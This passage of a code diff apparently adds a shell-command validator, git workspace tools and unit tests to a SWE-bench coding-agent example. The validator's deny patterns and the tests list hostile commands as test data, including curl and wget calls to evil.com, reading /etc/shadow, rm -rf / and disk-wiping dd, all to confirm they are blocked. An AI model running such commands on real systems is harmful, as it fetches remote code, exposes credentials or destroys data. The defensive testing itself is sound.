"Suspicious environment variable execution pattern detected"), + + # ===== Xargs command execution ===== + # Xargs can be used to execute commands from input. + # Examples: "echo 'rm -rf /' | xargs", "find . | xargs rm", "cat cmds.txt | xargs -I{} bash -c '{}'" + (re.compile(r'\|\s*xargs\s+.*(?:-I|-i).*(?:bash|sh|eval)'), + "Xargs with shell execution is not allowed"), + + # ===== Source/dot command execution ===== + # Source or dot can execute scripts in the current shell context. + # Examples: "source /tmp/malicious.sh", ". ./exploit.sh", "source <(curl url)" + (re.compile(r'(?:^|[;&|]\s*)(?:source|\.)[ \t]+'), + "source/dot command execution is not allowed"), +] + + +def validate_command(command: str) -> tuple[bool, str]: + """Validate that a command is safe to execute. + + Checks against two pattern lists: + 1. DANGEROUS_PATTERNS: Direct dangerous commands (rm -rf /, sudo, etc.) + 2. BYPASS_PATTERNS: Shell metacharacter tricks that could evade command filtering + + Args: + command: The bash command string to validate. + + Returns: + A tuple of (is_valid, error_message). + is_valid is True if the command passes all safety checks. + error_message is empty string if valid, otherwise describes the violation. + """ + # Check dangerous command patterns + for pattern, message in DANGEROUS_PATTERNS: + if pattern.search(command): + return False, message + + # Check bypass/evasion patterns + for pattern, message in BYPASS_PATTERNS: + if pattern.search(command): + return False, message + + return True, "" diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py new file mode 100644 index 0000000000..bcd923c929 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py new file mode 100644 index 0000000000..77b0bcdb87 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -0,0 +1,208 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import asyncio +import logging +import os +import shutil +from dataclasses import dataclass +from pathlib import Path +from urllib.parse import urlparse + +from git import Repo + +logger = logging.getLogger(__name__) + + +@dataclass +class RepoContext: + """Context manager for repository operations.""" + repo_url: str + repo_path: Path # Actual path where the repo is cloned + repo: Repo | None = None + + +class RepoManager: + """Manages git repository cloning and cleanup for SWE-bench instances.""" + + def __init__(self, workspace_dir: str): + """Initialize the repository manager. + + Args: + workspace_dir: Base directory for cloning repositories. + """ + self.workspace = Path(workspace_dir) + self.workspace.mkdir(parents=True, exist_ok=True) + self.active_repos = {} + + async def setup_repository( + self, repo_url: str, base_commit: str, instance_id: str | None = None + ) -> RepoContext: + """Setup a repository at a specific commit. + + Args: + repo_url: URL of the repository to clone. + base_commit: Commit hash to checkout. + instance_id: Optional instance ID for workspace isolation. When provided, + each instance gets its own clean workspace directory. + + Returns: + RepoContext containing the repository path and Repo object. + + Raises: + ValueError: If the repository URL is invalid. + asyncio.TimeoutError: If clone or checkout times out. + """ + repo_path = get_repo_path(str(self.workspace), repo_url, instance_id) + + if str(repo_path) in self.active_repos: + context = self.active_repos[str(repo_path)] + await checkout_commit(context.repo, base_commit) + return context + + repo = await clone_repository(repo_url, repo_path) + await checkout_commit(repo, base_commit) + + context = RepoContext(repo_url=repo_url, repo_path=repo_path, repo=repo) + self.active_repos[str(repo_path)] = context + return context + + async def cleanup(self) -> None: + """Clean up all managed repositories. + + Removes all cloned repository directories and clears the active repos cache. + """ + for repo_path_str in list(self.active_repos.keys()): + repo_path = Path(repo_path_str) + if repo_path.exists(): + await asyncio.to_thread(shutil.rmtree, repo_path) + self.active_repos.clear() + + +def get_repo_path(workspace_dir: str, repo_url: str, instance_id: str | None = None) -> Path: + """Generate a unique path for the repository. + + Args: + workspace_dir: Base workspace directory + repo_url: URL of the repository + instance_id: Optional instance ID for unique workspace isolation + + Returns: + Path to the repository. If instance_id is provided, returns + workspace_dir/instance_id/org/repo for complete isolation. + Otherwise returns workspace_dir/org/repo. + + Raises: + ValueError: If instance_id contains path traversal characters or repo_url is malformed. + """ + # Sanitize instance_id to prevent path traversal attacks + if instance_id: + if ".." in instance_id or "/" in instance_id or "\\" in instance_id: + raise ValueError(f"Invalid instance_id: contains path traversal characters: {instance_id}") + + # Parse repo URL to extract org and repo names + if "://" in repo_url: + path = urlparse(repo_url).path + else: + # SSH form: git@host:org/repo.git + path = repo_url.split(":", 1)[-1] + + parts = path.strip("/").split("/") + if len(parts) < 2: + raise ValueError(f"Invalid repo_url: cannot extract org/repo from: {repo_url}") + + repo_name = parts[-1].replace('.git', '') + org_name = parts[-2] + + # Validate extracted names are not empty + if not org_name or not repo_name: + raise ValueError(f"Invalid repo_url: empty org or repo name from: {repo_url}") + + # If instance_id is provided, create isolated workspace per instance + if instance_id: + return Path(workspace_dir) / instance_id / org_name / repo_name + + # Default: workspace_dir/org/repo + return Path(workspace_dir) / org_name / repo_name + + +async def clone_repository(repo_url: str, target_path: Path, timeout: int = 600) -> Repo: + """Clone a repository with timeout and error handling. + + Args: + repo_url: URL of the repository to clone. + target_path: Local path to clone into. + timeout: Maximum time in seconds for clone operation. + + Returns: + The cloned Repo object. + + Raises: + ValueError: If repo_url format is invalid. + asyncio.TimeoutError: If clone exceeds timeout. + """ + logger.info("Cloning repository %s to %s", repo_url, target_path) + + # Validate URL format + if not (repo_url.startswith('https://') or repo_url.startswith('git@')): + raise ValueError(f"Invalid repository URL: {repo_url}") + + # Clean existing path + if target_path.exists(): + await asyncio.to_thread(shutil.rmtree, target_path) + + try: + repo = await asyncio.wait_for( + asyncio.to_thread(Repo.clone_from, repo_url, target_path), + timeout=timeout + ) + logger.info("Successfully cloned %s", repo_url) + return repo + except asyncio.TimeoutError: + logger.error("Clone timed out for %s after %ds", repo_url, timeout) + if target_path.exists(): + await asyncio.to_thread(shutil.rmtree, target_path) + raise + except Exception as e: + logger.error("Clone failed for %s: %s", repo_url, e) + if target_path.exists(): + await asyncio.to_thread(shutil.rmtree, target_path) + raise + + +async def checkout_commit(repo: Repo, commit_hash: str, timeout: int = 120): + """Checkout a specific commit with timeout and error handling. + + Args: + repo: The repository object. + commit_hash: The commit hash to checkout. + timeout: Maximum time in seconds for checkout operation. + + Raises: + asyncio.TimeoutError: If checkout exceeds timeout. + """ + logger.info("Checking out commit %s", commit_hash) + try: + await asyncio.wait_for( + asyncio.to_thread(repo.git.checkout, commit_hash), + timeout=timeout + ) + logger.info("Successfully checked out %s", commit_hash) + except asyncio.TimeoutError: + logger.error("Checkout timed out for %s after %ds", commit_hash, timeout) + raise + except Exception as e: + logger.error("Checkout failed for %s: %s", commit_hash, e) + raise diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py new file mode 100644 index 0000000000..d0facf41c4 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -0,0 +1,100 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# Register all the tools needed by the full predictor without loading the dependencies. +import logging +import typing + +from nat.builder.builder import Builder +from nat.builder.function_info import FunctionInfo +from nat.cli.register_workflow import register_function +from nat.data_models.function import FunctionBaseConfig + +logger = logging.getLogger(__name__) + + +class GitRepoToolConfig(FunctionBaseConfig, name="git_repo_tool"): + """Configuration for git repository management tool.""" + _type: typing.Literal["git_repo_tool"] = "git_repo_tool" + workspace_dir: str = "./.workspace" # Base directory for cloning repositories + cleanup_on_exit: bool = True # Whether to clean up repos after use + + +@register_function(config_type=GitRepoToolConfig) +async def git_repo_tool(tool_config: GitRepoToolConfig, builder: Builder): + """Git repository management tool for SWE Bench. + + Args: + tool_config: Configuration for the git tool. + builder: NAT builder instance. + + Yields: + FunctionInfo for the git_operations function. + """ + import json + + from .git_tool import RepoManager + repo_manager = RepoManager(tool_config.workspace_dir) + + async def git_operations(args_str: str) -> str: + """Perform git operations based on JSON input. + + Args: + args_str: JSON string with 'operation' and operation-specific parameters. + Supported operations: + - setup: requires 'repo_url', 'base_commit', optional 'instance_id' + - cleanup: no additional parameters + + Returns: + For 'setup': the repository path as a string. + For 'cleanup': "Cleanup complete". + + Raises: + ValueError: If JSON is invalid or operation is unknown. + """ + try: + args = json.loads(args_str) + except json.JSONDecodeError as e: + raise ValueError(f"Invalid JSON input: {e}") from e + + operation = args.get('operation') + + if operation == "setup": + if 'repo_url' not in args or 'base_commit' not in args: + raise ValueError("setup operation requires 'repo_url' and 'base_commit'") + # instance_id is optional - when provided, creates isolated workspace per instance + instance_id = args.get('instance_id') + context = await repo_manager.setup_repository( + args['repo_url'], args['base_commit'], instance_id + ) + return str(context.repo_path) + + if operation == "cleanup": + await repo_manager.cleanup() + return "Cleanup complete" + + raise ValueError(f"Unknown operation: {operation}. Supported: 'setup', 'cleanup'") + + try: + yield FunctionInfo.from_fn(git_operations, + description="Git repository management tool that accepts JSON string arguments") + finally: + if tool_config.cleanup_on_exit: + try: + await repo_manager.cleanup() + logger.info("Workspace cleanup completed successfully") + except Exception as e: + logger.error("Workspace cleanup failed: %s", e, exc_info=True) + # Don't raise - allow graceful degradation diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py index 61e8f1a469..afa1861eea 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py @@ -17,3 +17,4 @@ # Import the predictor classes to register them from nat_swe_bench.predictors.predict_gold.predict_gold_stub import SweBenchPredictor as GoldPredictor +from nat_swe_bench.predictors.predict_iterative.predict_iterative import SweBenchPredictor as IterativePredictor diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py index ef10ebc8aa..7ef908ebf8 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py @@ -16,3 +16,4 @@ # flake8: noqa: F401, pylint: disable=unused-import # imports tools to register them +from nat_swe_bench.predictors.predict_iterative.tools.register import git_repo_tool diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py new file mode 100644 index 0000000000..0eaeadc9d3 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -0,0 +1,774 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +"""Unit tests for the iterative predictor.""" + +import asyncio +import subprocess +from unittest.mock import AsyncMock +from unittest.mock import MagicMock +from unittest.mock import patch + +import pytest + +from nat_swe_bench.predictors.predict_iterative.predict_iterative import ExecutionTimeoutError +from nat_swe_bench.predictors.predict_iterative.predict_iterative import IterativeAgent +from nat_swe_bench.predictors.predict_iterative.predict_iterative import IterativeAgentConfig +from nat_swe_bench.predictors.predict_iterative.shell_validation import validate_command + +# ============================================================================= +# Fixtures +# ============================================================================= + +@pytest.fixture(name="mock_llm") +def fixture_mock_llm(): + """Create a mock LLM that returns configurable responses.""" + llm = AsyncMock() + return llm + + +@pytest.fixture(name="agent_config") +def fixture_agent_config(): + """Create a default agent configuration for testing.""" + return IterativeAgentConfig( + step_limit=10, + timeout=5, + max_output_length=1000 + ) + + +@pytest.fixture(name="temp_repo_path") +def fixture_temp_repo_path(tmp_path): + """Create a temporary directory to simulate a repository.""" + repo_path = tmp_path / "test_repo" + repo_path.mkdir() + return repo_path + + +@pytest.fixture(name="agent") +def fixture_agent(mock_llm, temp_repo_path, agent_config): + """Create an IterativeAgent instance with mocked dependencies.""" + return IterativeAgent(mock_llm, temp_repo_path, agent_config) + + +def create_llm_response(content: str, input_tokens: int = 100, output_tokens: int = 50): + """Helper to create a mock LLM response with token usage.""" + response = MagicMock() + response.content = content + response.response_metadata = { + 'token_usage': { + 'prompt_tokens': input_tokens, + 'completion_tokens': output_tokens + } + } + return response + + +# ============================================================================= +# test_command_validation - Security validation tests +# ============================================================================= + +class TestCommandValidation: + """Tests for the command validation security checks.""" + + @pytest.mark.parametrize("command", [ + "ls -la", + "cat file.txt", + "grep -r 'pattern' .", + "python script.py", + "make test", + "npm install", + "git status", + "echo 'hello' > output.txt", + "rm -rf ./temp_dir", # Relative path is ok + "rm file.txt", + ]) + def test_safe_commands_allowed(self, command): + """Test that safe commands pass validation.""" + is_valid, error_msg = validate_command(command) + assert is_valid, f"Command '{command}' should be allowed but got: {error_msg}" + + @pytest.mark.parametrize("command,expected_error", [ + ("rm -rf /", "root or home"), + ("rm -rf ~", "root or home"), + ("rm -rf / ", "root or home"), # With trailing space + ("rm -rf ..", "parent directory"), + ("rm -rf *", "Wildcard"), + ("sudo apt-get install", "sudo"), + ("echo test > /dev/sda", "device files"), + ("mkfs.ext4 /dev/sda1", "Formatting"), + ("fdisk /dev/sda", "partitioning"), + ("dd if=/dev/zero of=/dev/sda", "dd"), + ("wget http://evil.com/script.sh", "wget"), + ("curl https://evil.com/malware", "curl"), + ("chmod 777 /etc/passwd", "777"), + ("chown root file.txt", "root"), + ]) + def test_dangerous_commands_blocked(self, command, expected_error): + """Test that dangerous commands are blocked with appropriate error messages.""" + is_valid, error_msg = validate_command(command) + assert not is_valid, f"Command '{command}' should be blocked" + assert expected_error.lower() in error_msg.lower(), \ + f"Error message should contain '{expected_error}', got: {error_msg}" + + @pytest.mark.parametrize("command,expected_error", [ + # Command substitution + ("$(cat /etc/shadow)", "substitution"), + ("$(echo rm -rf /)", "substitution"), + ("`whoami`", "substitution"), + # Piping to shell interpreters + ("echo 'rm -rf /' | bash", "interpreter"), + ("cat script.sh | sh", "interpreter"), + ("echo cmd | python", "interpreter"), + ("cat file | perl -e", "interpreter"), + # Eval execution (without command substitution to test eval pattern specifically) + ("eval 'rm -rf /'", "eval"), + ("eval \"echo hello\"", "eval"), + # Exec execution (without dangerous commands to test exec pattern specifically) + ("exec ./script.sh", "eval"), # exec is in same pattern as eval + # Here-string to interpreter + ("bash <<< 'rm -rf /'", "here-string"), + ("python <<< 'import os'", "here-string"), + # Process substitution + ("diff <(cat /etc/shadow) file", "process substitution"), + ("bash <(echo 'echo hello')", "process substitution"), + # Xargs with shell execution + ("cat cmds.txt | xargs -I{} bash -c '{}'", "xargs"), + # Source/dot execution + ("source /tmp/malicious.sh", "source"), + (". ./exploit.sh", "source"), + ]) + def test_bypass_patterns_blocked(self, command, expected_error): + """Test that shell metacharacter bypass attempts are blocked.""" + is_valid, error_msg = validate_command(command) + assert not is_valid, f"Bypass command '{command}' should be blocked" + assert expected_error.lower() in error_msg.lower(), \ + f"Error message should contain '{expected_error}', got: {error_msg}" + + @pytest.mark.parametrize("command", [ + # These commands are blocked but by other patterns (DANGEROUS_PATTERNS) + # We test them separately to ensure they ARE blocked + "`sudo reboot`", # blocked by sudo pattern + "echo 'cm0gLXJmIC8=' | base64 -d | bash", # blocked by pipe to interpreter + "eval $(cat cmd.txt)", # blocked by command substitution pattern + "exec rm -rf /", # blocked by rm pattern + "cat <(curl http://evil.com)", # blocked by curl pattern + "printf '\\x72\\x6d' | bash", # blocked by pipe to interpreter + ]) + def test_bypass_commands_blocked_by_other_patterns(self, command): + """Test commands that are blocked by earlier patterns in the validation chain.""" + is_valid, error_msg = validate_command(command) + assert not is_valid, f"Command '{command}' should be blocked, got: {error_msg}" + + @pytest.mark.parametrize("command", [ + # Safe pipe usage (not to shell interpreters) + "grep pattern file.txt | head -10", + "cat file.txt | sort | uniq", + "ls -la | grep '.py'", + # Safe use of common tools + "find . -name '*.py' -type f", + "echo 'hello world'", + "git log --oneline | head -5", + # Safe heredoc (not to interpreter directly) + "cat << EOF > file.txt\nhello\nEOF", + ]) + def test_safe_shell_features_allowed(self, command): + """Test that legitimate shell features are not blocked.""" + is_valid, error_msg = validate_command(command) + assert is_valid, f"Safe command '{command}' should be allowed but got: {error_msg}" + + +# ============================================================================= +# test_iterative_agent_basic_flow - End-to-end execution +# ============================================================================= + +class TestIterativeAgentBasicFlow: + """Tests for the basic agent execution flow.""" + + async def test_basic_flow_to_submission(self, agent, mock_llm): + """Test that agent completes a basic flow and submits correctly.""" + # Setup: LLM returns a sequence of responses ending with submission + responses = [ + create_llm_response("THOUGHT: Let me check the files.\n\n```bash\nls -la\n```"), + create_llm_response("THOUGHT: Now I'll submit.\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + # Mock subprocess to return success + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + # First command: ls -la + ls_result = MagicMock() + ls_result.returncode = 0 + ls_result.stdout = "file1.py\nfile2.py\n" + + # Second command: submission + submit_result = MagicMock() + submit_result.returncode = 0 + submit_result.stdout = "COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\ndiff --git a/file.py b/file.py\n+fixed line" + + mock_thread.side_effect = [ls_result, submit_result] + + exit_status, result = await agent.run("Fix the bug in file.py") + + assert exit_status == "Submitted" + assert "diff" in result or "COMPLETE_TASK" in result + assert agent.n_steps == 2 + + async def test_token_accumulation(self, agent, mock_llm): + """Test that tokens are correctly accumulated across steps.""" + responses = [ + create_llm_response("THOUGHT: Step 1\n\n```bash\nls\n```", input_tokens=100, output_tokens=50), + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```", input_tokens=200, output_tokens=100), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + result1 = MagicMock(returncode=0, stdout="output") + result2 = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + mock_thread.side_effect = [result1, result2] + + await agent.run("Test task") + + assert agent.total_input_tokens == 300 # 100 + 200 + assert agent.total_output_tokens == 150 # 50 + 100 + + async def test_step_limit_exceeded(self, mock_llm, temp_repo_path): + """Test that agent stops when step limit is reached.""" + config = IterativeAgentConfig(step_limit=2, timeout=5) + agent = IterativeAgent(mock_llm, temp_repo_path, config) + + # LLM always returns a valid command but never submits + mock_llm.ainvoke = AsyncMock( + return_value=create_llm_response("THOUGHT: Working\n\n```bash\nls\n```") + ) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="output") + + exit_status, result = await agent.run("Task") + + assert exit_status == "LimitsExceeded" + assert "step limit" in result.lower() + + +# ============================================================================= +# test_format_error_recovery - LLM output validation +# ============================================================================= + +class TestFormatErrorRecovery: + """Tests for handling malformed LLM responses.""" + + async def test_recovery_from_no_bash_block(self, agent, mock_llm): + """Test that agent recovers when LLM doesn't include a bash block.""" + responses = [ + # First response: no bash block + create_llm_response("THOUGHT: I'm thinking about this problem..."), + # Second response: proper bash block + create_llm_response("THOUGHT: Now I'll run a command.\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + assert agent.n_steps == 2 # First step failed format, second succeeded + + async def test_recovery_from_multiple_bash_blocks(self, agent, mock_llm): + """Test that agent recovers when LLM includes multiple bash blocks.""" + responses = [ + # First response: multiple bash blocks + create_llm_response("```bash\nls\n```\n\n```bash\ncat file.txt\n```"), + # Second response: single bash block + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + + async def test_recovery_from_dangerous_command(self, agent, mock_llm): + """Test that agent recovers when LLM suggests a dangerous command.""" + responses = [ + # First response: dangerous command + create_llm_response("THOUGHT: Delete everything\n\n```bash\nrm -rf /\n```"), + # Second response: safe command + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + + +# ============================================================================= +# test_timeout_handling - Command timeout scenarios +# ============================================================================= + +class TestTimeoutHandling: + """Tests for command execution timeout handling.""" + + async def test_command_timeout_recovery(self, agent, mock_llm): + """Test that agent recovers from a command timeout.""" + responses = [ + create_llm_response("THOUGHT: Run slow command\n\n```bash\nsleep 100\n```"), + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + # First call: timeout + mock_thread.side_effect = [ + subprocess.TimeoutExpired(cmd="sleep 100", timeout=5), + MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch"), + ] + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + + async def test_timeout_message_includes_command(self, agent, mock_llm): + """Test that timeout error message includes the timed-out command.""" + mock_llm.ainvoke = AsyncMock( + return_value=create_llm_response("THOUGHT: Slow\n\n```bash\nsleep 999\n```") + ) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.side_effect = subprocess.TimeoutExpired(cmd="sleep 999", timeout=5) + + # Run one step - it will timeout and add error message + agent.add_message("system", "test") + agent.add_message("user", "test") + agent.n_steps = 1 + + response = await agent._query_llm() + + with pytest.raises(ExecutionTimeoutError) as exc_info: + await agent._execute_action(response) + + assert "sleep 999" in str(exc_info.value) + + +# ============================================================================= +# test_workspace_isolation - Concurrent instance isolation +# ============================================================================= + +class TestWorkspaceIsolation: + """Tests for workspace isolation between instances.""" + + def test_different_instance_ids_get_different_paths(self, tmp_path): + """Test that different instance_ids produce different workspace paths.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + repo_url = "https://github.com/org/repo" + + path1 = get_repo_path(workspace, repo_url, instance_id="instance-001") + path2 = get_repo_path(workspace, repo_url, instance_id="instance-002") + + assert path1 != path2 + assert "instance-001" in str(path1) + assert "instance-002" in str(path2) + + def test_same_instance_id_gets_same_path(self, tmp_path): + """Test that the same instance_id always produces the same path.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + repo_url = "https://github.com/org/repo" + instance_id = "instance-001" + + path1 = get_repo_path(workspace, repo_url, instance_id=instance_id) + path2 = get_repo_path(workspace, repo_url, instance_id=instance_id) + + assert path1 == path2 + + def test_no_instance_id_uses_default_path(self, tmp_path): + """Test that no instance_id uses the default org/repo path.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + repo_url = "https://github.com/myorg/myrepo" + + path = get_repo_path(workspace, repo_url, instance_id=None) + + assert str(path) == f"{workspace}/myorg/myrepo" + + def test_ssh_url_parsing(self, tmp_path): + """Test that SSH URLs are correctly parsed.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + repo_url = "git@github.com:org/repo.git" + + path = get_repo_path(workspace, repo_url, instance_id="test-123") + + assert "org" in str(path) + assert "repo" in str(path) + + @pytest.mark.parametrize("invalid_instance_id", [ + "../escape", + "foo/../bar", + "foo/bar", + "foo\\bar", + "..\\escape", + ]) + def test_instance_id_path_traversal_blocked(self, tmp_path, invalid_instance_id): + """Test that path traversal in instance_id is rejected.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + repo_url = "https://github.com/org/repo" + + with pytest.raises(ValueError) as exc_info: + get_repo_path(workspace, repo_url, instance_id=invalid_instance_id) + + assert "path traversal" in str(exc_info.value).lower() + + @pytest.mark.parametrize("invalid_url", [ + "not-a-url", + "https://github.com/", + "https://github.com", + "", + ]) + def test_malformed_repo_url_rejected(self, tmp_path, invalid_url): + """Test that malformed repo URLs are rejected.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + + with pytest.raises(ValueError) as exc_info: + get_repo_path(workspace, invalid_url) + + assert "invalid" in str(exc_info.value).lower() + + +# ============================================================================= +# test_repo_setup_and_checkout - Git operations +# ============================================================================= + +class TestRepoSetupAndCheckout: + """Tests for git repository setup and checkout operations.""" + + async def test_clone_repository_success(self, tmp_path): + """Test successful repository cloning.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + repo_url = "https://github.com/test/repo" + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.Repo') as MockRepo: + mock_repo = MagicMock() + MockRepo.clone_from.return_value = mock_repo + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.to_thread') as mock_thread: + mock_thread.return_value = mock_repo + + result = await clone_repository(repo_url, target_path) + + assert result == mock_repo + + async def test_clone_repository_invalid_url(self, tmp_path): + """Test that invalid URLs raise ValueError.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + invalid_url = "not-a-valid-url" + + with pytest.raises(ValueError) as exc_info: + await clone_repository(invalid_url, target_path) + + assert "Invalid repository URL" in str(exc_info.value) + + async def test_checkout_commit_success(self): + """Test successful commit checkout.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import checkout_commit + + mock_repo = MagicMock() + commit_hash = "abc123" + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.to_thread') as mock_thread: + mock_thread.return_value = None + + await checkout_commit(mock_repo, commit_hash) + + # Verify checkout was called + mock_thread.assert_called_once() + + async def test_clone_timeout(self, tmp_path): + """Test that clone operation times out correctly.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + repo_url = "https://github.com/test/repo" + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: + mock_wait.side_effect = TimeoutError() + + with pytest.raises(asyncio.TimeoutError): + await clone_repository(repo_url, target_path, timeout=1) + + +# ============================================================================= 